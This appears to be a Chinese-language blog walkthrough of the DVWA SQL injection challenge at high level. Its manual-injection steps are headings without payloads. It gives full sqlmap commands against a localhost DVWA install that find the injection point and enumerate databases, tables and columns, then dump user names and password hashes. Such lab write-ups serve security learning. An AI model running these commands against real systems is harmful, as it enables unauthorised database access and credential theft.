免责声明:本文仅分享SQL攻击相关知识,不承担任何法律责任。
DVWA请读者自行安装,本文不再赘述。
由于high level仅涉及简单攻击知识,本文不再详细解释。建议读者在理解SQL注入原理,熟悉low level、medium level解题姿势后再观看本文。
具体原理及姿势参见:
[网络安全]DVWA之SQL注入—low level解题详析
[网络安全]DVWA之SQL注入—medium level解题详析
手工注入
判断注入类型
由以上两个回显可知,该注入类型为字符型注入。
判断注入点个数
由以上两个回显可知,注入点个数为两个。
爆库名
爆表名
爆列名
爆字段
sqlmap注入
查看是否存在注入点
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1"
存在注入点。
爆库名
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1" --dbs
爆表名
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1" -D dvwa --tables
爆列名
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1" -D dvwa -t users --columns
-D、-T为大写或小写均可
爆字段
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1" -D dvwa -T users -C user,password --dump
总结
以上为DVWA之SQL注入—high level解题简析,使用手工注入及sqlmap分享SQL攻击知识。
后续会分享DVWA之SQL注入—Impossible level代码审计。
我是秋说,我们下次见。